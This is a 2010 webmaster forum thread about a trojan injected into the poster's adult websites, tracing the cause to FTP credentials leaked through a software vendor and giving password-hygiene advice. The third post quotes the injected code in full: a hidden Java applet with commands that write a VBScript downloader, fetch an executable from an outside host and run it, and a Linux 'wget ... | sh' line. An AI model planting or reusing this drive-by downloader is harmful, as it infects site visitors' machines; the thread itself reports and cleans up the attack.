|
2010-06-03, 07:27 AM | #1 |
wtfwjd?
Join Date: May 2007
Posts: 2,103
|
Trojan horse on my sites
Avast is reporting problems on some of my sites:
Code:
http://www.lusciousdelights.com/ http://www.joyporn.net/ http://sleazyporntube.com/ http://www.pantyerotica.com/ http://fuckingfreeforall.com/ |
2010-06-03, 09:14 AM | #2 |
Certified Nice Person
|
I have AVG integrated with my Google search, and they're still saying your sites are safe, so that's good. As long as you get it fixed before Google begins de-listing you, you'll be fine. I clicked-through to all of them, and only the free for all site is popping something suspicious. Something about an unverified application attempting to run.
__________________
Click here to purchase a bridge I'm selling. |
2010-06-03, 09:34 AM | #3 | |
Subversive filth of the hedonistic decadent West
Join Date: Mar 2003
Location: Southeast Florida
Posts: 27,936
|
Quote:
Code:
<applet width='0' height='0' code='Client.class' archive='Client.jar'> <param name='windows1' value='cmd.exe /c echo Const adTypeBinary = 1 > %temp%\winconfig.vbs & echo Const adSaveCreateOverWrite = 2 >> %temp%\winconfig.vbs & echo Dim S >> %temp%\winconfig.vbs & echo Dim A >> %temp%\winconfig.vbs & echo Dim DTNDTN >> %temp%\winconfig.vbs & echo S = "ADODB" >> %temp%\winconfig.vbs & echo A = ".Stream" >> %temp%\winconfig.vbs & echo Set DTNDTN = CreateObject(S+A) >> %temp%\winconfig.vbs & echo DTNDTN.Type = adTypeBinary >> %temp%\winconfig.vbs & echo DTNDTN.Open >> %temp%\winconfig.vbs & echo DTNDTN.Write BinaryGetURL(Wscript.Arguments(0)) >> %temp%\winconfig.vbs & echo DTNDTN.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> %temp%\winconfig.vbs & echo Function BinaryGetURL(URL) >> %temp%\winconfig.vbs & echo Dim Http >> %temp%\winconfig.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> %temp%\winconfig.vbs & echo Http.Open "GET", URL, False >> %temp%\winconfig.vbs & echo Http.Send >> %temp%\winconfig.vbs & echo BinaryGetURL = Http.ResponseBody >> %temp%\winconfig.vbs & echo End Function >> %temp%\winconfig.vbs & echo Set shell = CreateObject("WScript.Shell") >> %temp%\winconfig.vbs & echo shell.Run "%temp%\update.exe" >> %temp%\winconfig.vbs & start %temp%\winconfig.vbs http://galengroup.org/1.exe %temp%\update.exe'> <param name='windows2' value=''> <param name='unix1' value=""> <param name='unix2' value=""> <param name='linux1' value="wget http://galengroup.org/1.exe -O- | sh"> <param name='linux2' value=""> </applet> |
|
2010-06-03, 10:37 AM | #4 |
wtfwjd?
Join Date: May 2007
Posts: 2,103
|
Chris at Colo-Cation is on it, looks like it's fixed. I just notified him this morning a little while ago, so it was a very quick response and fix.
It looks like someone uploaded something via ftp using my login. The interesting thing is, I recently entered my login info in the "hidden" area at JBM software's support forum for Jeremy to check something out. That's the only time I have ever given this info out...hmmm |
2010-06-03, 11:47 AM | #5 |
a.k.a. Sparky
Join Date: Sep 2004
Location: West Palm Beach, FL, USA
Posts: 2,396
|
That would explain the other client with tubex being compromised from the same IP.
__________________
SnapReplay.com a different way to share photos - iPhone & Android |
2010-06-03, 12:03 PM | #6 |
"Young dumb and full of cum"
|
Is this a tubex related incident or JBM Soft?
All of a sudden I'm a little worried now.
__________________
JAPANESE ADULT AFFILIATE PROGRAM |
2010-06-03, 12:16 PM | #7 |
a.k.a. Sparky
Join Date: Sep 2004
Location: West Palm Beach, FL, USA
Posts: 2,396
|
The hacker used the FTP username/password to modify a few files on the server. Generally when that happens, the username/password has been leaked somewhere through a keylogger/spyware/trojan or, like this case, a vendor storing the user/password/hostname in the clear somewhere.
When you give a password to a vendor, you should change it after they are done, or, change it to something, give it to them, and then change it after they are done. You would be surprised at the frequency this happens.
__________________
SnapReplay.com a different way to share photos - iPhone & Android |
2010-06-03, 12:22 PM | #8 | |
Subversive filth of the hedonistic decadent West
Join Date: Mar 2003
Location: Southeast Florida
Posts: 27,936
|
Quote:
I did this just last month after I wanted JBM Soft to take a look at my install of TubeX. |
|
2010-06-03, 02:17 PM | #9 | |
wtfwjd?
Join Date: May 2007
Posts: 2,103
|
Quote:
Guess you can't be too careful...live and learn. |
|
2010-06-03, 03:43 PM | #10 |
Well you know boys, a nuclear reactor is a lot like women. You just have to read the manual and press the right button
Join Date: Sep 2003
Location: United Kingdom
Posts: 150
|
Had this happen to me too but not with JBM - created a temp ftp account and sure enough after the company had used it someone else sneaked in and installed a load of crap on the server.
|
|
|